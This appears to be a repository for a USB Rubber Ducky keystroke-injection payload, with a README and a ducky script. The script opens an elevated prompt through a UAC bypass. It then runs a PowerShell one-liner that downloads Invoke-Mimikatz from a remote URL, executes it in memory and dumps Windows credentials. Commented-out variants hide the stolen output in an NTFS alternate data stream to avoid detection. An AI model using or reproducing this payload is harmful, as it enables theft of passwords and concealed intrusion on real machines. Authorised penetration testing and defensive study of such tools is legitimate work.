├── Invoke-Mimikatz.ps1 ├── README.md └── mimi_mem.txt /README.md: -------------------------------------------------------------------------------- 1 | # usb-rubber-ducky--mimikatz-in-mem 2 | USB-Rubber-Ducky Payload - Mimikatz in Memory w UAC Bypass 3 | 4 | This is a pyalod for the USB Rubber Ducky. It uses PowerShell to download and execute Mimikatz in memory. 5 | 6 | For in memory Mimikatz this uses PowerSploit's (Joe Bialek's) Invoke-Mimikatz.ps1. For UAC bypass / admin prompt this uses Darren Kitchen's payload from here: https://forums.hak5.org/index.php?/topic/30100-payload-faster-uac-bypass/ 7 | 8 | Feature : Status 9 | ------ 10 | Get Admin command prompt (required for Mimikatz) : COMPLETE 11 | Download and execute Mimikatz in Memory : COMPLETE 12 | Option to pipe output to an hidden data stream on disk : COMPLETE 13 | Option to pipe output over network (GET requests?) : thinking about it... -------------------------------------------------------------------------------- /mimi_mem.txt: -------------------------------------------------------------------------------- 1 | REM ************************************************** 2 | REM Payload: Download and execute Mimikatz in memory 3 | REM Target: Window 7 4 | REM Author: Charles Worrell 5 | REM Based on UAC bypass by Darren Kitchen 6 | REM Invoke-Mimikatz from PowerSploit by Joe Bialek 7 | REM ************************************************** 8 | DELAY 1000 9 | GUI r 10 | DELAY 3000 11 | STRING powershell Start-Process cmd -Verb runAs 12 | ENTER 13 | DELAY 3000 14 | ALT y 15 | DELAY 500 16 | REM Tried to combine with Start-Process above but it wasnt working. Will need to revisit... 17 | STRING powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/binarycanary/usb-rubber-ducky--mimikatz-in-mem/master/Invoke-Mimikatz.ps1')"; Invoke-Mimikatz -DumpCreds 18 | ENTER 19 | STRING enjoy da passwerdz :) 20 | REM ************************************************** 21 | REM Alternate piping of output 22 | REM ************************************************** 23 | REM ** Pipe output to a file on desktop. Send it to an alternate data stream so its not as easy to find :) 24 | REM ** To open up the ADS: notepad %USERPROFILE%\Desktop\NewTextDocument.txt:hiddenADS.txt 25 | REM ** If someone happens to open NewTextDocument.txt (notepad %USERPROFILE%\Desktop\NewTextDocument.txt) they wont see anything. Need streams to detect. 26 | REM powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8000/Invoke-Mimikatz.ps1')"; Invoke-Mimikatz -DumpCreds > %USERPROFILE%\Desktop\NewTextDocument.txt:hiddenADS.txt 2>&1 27 | REM *** Just dump output in command window 28 | REM powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8000/Invoke-Mimikatz.ps1')"; Invoke-Mimikatz -DumpCreds 29 | --------------------------------------------------------------------------------